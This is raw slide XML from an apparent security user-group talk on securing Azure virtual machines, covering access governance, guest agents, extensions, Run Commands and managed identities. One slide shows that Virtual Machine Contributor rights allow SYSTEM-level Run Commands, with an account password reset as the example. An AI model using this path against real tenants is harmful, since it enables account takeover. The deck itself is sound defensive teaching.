                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>@MsSecUGNorway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63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9" r:id="rId12"/>
    <p:sldLayoutId id="2147483670" r:id="rId13"/>
    <p:sldLayoutId id="2147483671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04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4420" y="6571338"/>
            <a:ext cx="3733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alpha val="80000"/>
                  </a:scheme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228708A-075D-4980-A833-237E2466F08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" y="5962808"/>
            <a:ext cx="893790" cy="895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4C11AE-FC43-4D28-9F7C-CAE1A33E7371}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4359566" y="6574931"/>
            <a:ext cx="3284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noProof="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>©2022 Microsoft Security User Group Norway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81ED09-5C7E-4425-A394-9BA447C8A189}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11077338" y="6586591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>
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>#MSUGN</a:t>
            </a:r>
            <a:endParaRPr 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8E4FD-96FB-45DC-B234-DA96293CAC85}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10593231" y="6455922"/>
            <a:ext cx="10967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>
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>@MsSecUGNorway</a:t>
            </a:r>
            <a:endParaRPr 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566C4-94A0-44DB-88B6-51620ABCF960}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10593230" y="6306486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>
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:hlinkClick r:id="rId14"/>
              </a:rPr>
              <a:t>github.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:hlinkClick r:id="rId14"/>
              </a:rPr>
              <a:t>msugn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7D934E5A-E5A7-4526-A806-D553111F1AC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712" y="6523366"/>
            <a:ext cx="124142" cy="124142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E9C0D8A6-34C2-488E-95FB-8CD7908FC050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139" y="6360073"/>
            <a:ext cx="141339" cy="14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8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github.com/SwiftOnSecurity/sysmon-config" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://bit.ly/3vclP4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7.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://msandbu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linkedin.com/in/marius-sandbu-a2b0141b/" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image11.jpeg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/msandbu" TargetMode="External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emf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6E36B62D-34E6-41D4-B3AA-AC21AB38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081043" y="770467"/>
            <a:ext cx="6608963" cy="3352800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO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Securing Virtual Machine Workloads in Azure</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="6800" dirty="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97E92409-AD19-4CE3-9956-8C03560F7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8" name="Picture 10" descr="Hacker - Free people icons">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AF6A2824-07FF-4490-B270-C5103AD19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71" y="1470617"/>
            <a:ext cx="3226468" cy="322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12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4D80DA-ECE0-4461-955E-6BD2D3B70227}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4782219" y="248844"/>
            <a:ext cx="9551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b="1" dirty="0"/>
              <a:t>Access </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000" b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AC413AF-CB46-41C3-A839-245552650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370" y="270793"/>
            <a:ext cx="4057629" cy="5610859"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="nb-NO" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nb-NO" sz="2000" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" sz="2000" b="1" dirty="0"/>
              <a:t>Permissions should only be temporary</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nb-NO" sz="2000" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" sz="2000" b="1" dirty="0"/>
              <a:t>Can also make custom Azure Roles using JSON based template</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nb-NO" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" sz="2000" b="1" dirty="0"/>
              <a:t>Access over a longer period should be handled using Access Review</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" dirty="0"/>
              <a:t>Does user still require access after two months? </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nb-NO" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" sz="2000" b="1" dirty="0"/>
              <a:t>Group based access please</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="nb-NO" sz="2000" dirty="0">
              <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nb-NO" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nb-NO" sz="20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5BB240-91DC-4C51-B81D-E6379EC8833F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5933732" y="1131488"/>
            <a:ext cx="4986441" cy="1322262"/>
          </a:xfrm>
          <a:prstGeom prst="round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 dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Access Packages:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="ctr">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nb-NO" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>SharePoint Sites</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="ctr">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nb-NO" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Azure AD Applications</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="ctr">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nb-NO" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Azure AD Grupper og Teams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28C1CD-A54E-4775-AF2F-EEE9F372D5E4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5941407" y="2790346"/>
            <a:ext cx="4986441" cy="1235645"/>
          </a:xfrm>
          <a:prstGeom prst="round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 dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Privileged Identity Management</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="ctr">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nb-NO" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Azure AD Roller</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="ctr">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nb-NO" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Azure Resource Manager Roller (Custom Roles)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="ctr">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nb-NO" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Kan defineres på ulike scope (Ressurs gruppe, Sub, MG)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25BCBB-0B29-42C2-82DB-2D18F2E5F0E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5949082" y="4324213"/>
            <a:ext cx="4986441" cy="1274020"/>
          </a:xfrm>
          <a:prstGeom prst="round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000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CloudKnox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Kommer snart..ja veldig snart</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="ctr">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nb-NO" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Azure Resource Manager (Provider Tilganger)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="ctr">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nb-NO" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Basert på historisk tilganger</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="ctr">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nb-NO" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Andre skyleverandører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0B6CA3-E383-4CE8-BF28-9354E227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307" y="2753111"/>
            <a:ext cx="7354326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8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4D80DA-ECE0-4461-955E-6BD2D3B70227}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2091156" y="302652"/>
            <a:ext cx="9551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b="1" dirty="0"/>
              <a:t>Azure Agents for virtual machines</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000" b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AC413AF-CB46-41C3-A839-245552650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534" y="994335"/>
            <a:ext cx="4102437" cy="5601310"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>To guest agents by default</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Provisioning Agent</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Windows Guest Agent</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>PA Agent needs to be installed to properly start VM. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Doomsday – 13 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>Oktober</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> 2021</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Windows Guest Agent used for many different features</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>DNS lookup</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Extension installation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Snapshot backup</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="265113" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Runs as local system on machine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Extensions collected from Azure Blob Storage via 168.63.129.16</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nb-NO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FCEC4-4B83-45D9-A048-34AAD7901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439" y="1266710"/>
            <a:ext cx="5506157" cy="3078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EB7508-C7AD-4791-8923-F538788E3118}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5378419" y="4530871"/>
            <a:ext cx="62955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0101FD"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>az</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0101FD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0101FD"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>vm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0101FD"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t> extension set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="171717"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>\ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="006881"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>--resource-group</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600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171717"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>myResourceGroup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="171717"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t> \ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="006881"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="006881"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>vm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="006881"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>-name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600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171717"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>myVM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="171717"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t> \ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="006881"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>--name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600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171717"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>DependencyAgentLinux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="171717"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t> \ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="006881"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>--publisher</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600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171717"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>Microsoft.Azure.Monitoring.DependencyAgent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="171717"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t> \ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="006881"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>--version</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="171717"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t> 9.5 \ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="006881"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="006881"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>enable-auto-upgrade</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="171717"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="07704A"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>true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8248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4D80DA-ECE0-4461-955E-6BD2D3B70227}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2712787" y="254860"/>
            <a:ext cx="9551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b="1" dirty="0"/>
              <a:t>Extensions and Run Commands </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000" b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AC413AF-CB46-41C3-A839-245552650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663" y="1072540"/>
            <a:ext cx="4864894" cy="5010760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Runs also as context of local system account</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>No way to remove the features</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>Only permission needed is</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1300" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="171717"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>Microsoft.Compute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="171717"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="171717"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>virtualMachines</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="171717"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="171717"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>runCommand</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="171717"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>/action</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="171717"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Accessible by Virtual Machine </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="171717"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Contributer</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1300" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="171717"/>
              </a:solidFill>
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Requires Public IP access to Azure from VM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Managed Run Commands in Preview</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Parallel execution of multiple scripts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Support for long running scripts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nb-NO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3BA69-25B2-43BF-9723-1F00E06B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774" y="1054100"/>
            <a:ext cx="4552272" cy="330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2B55C8-9723-4E3D-9A46-E314768B5238}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5936428" y="42442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</a:rPr>
              <a:t>Example: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Set-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ADAccountPassword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-Identity user03 -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NewPassword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$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NewPwd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-Reset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9A346-D0C2-4BD9-8BD2-25CC8C3459FD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5909064" y="4923122"/>
            <a:ext cx="60949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</a:rPr>
              <a:t>Log path: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>C:\WindowsAzure\Logs\Plugins\Microsoft.CPlat.Core.RunCommandWindows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2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4D80DA-ECE0-4461-955E-6BD2D3B70227}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="805782" y="357127"/>
            <a:ext cx="9551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b="1" dirty="0"/>
              <a:t>Managed Identities</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000" b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AC413AF-CB46-41C3-A839-245552650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663" y="1072540"/>
            <a:ext cx="4102437" cy="501076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Provides VMs with their own Azure AD Identity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Lives and dies with the VM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>Commonly used for authentication to other Azure Services</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Kubernetes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>What kind of permissions does the managed identities actually have?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1900" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="171717"/>
              </a:solidFill>
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1900" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="171717"/>
                </a:solidFill>
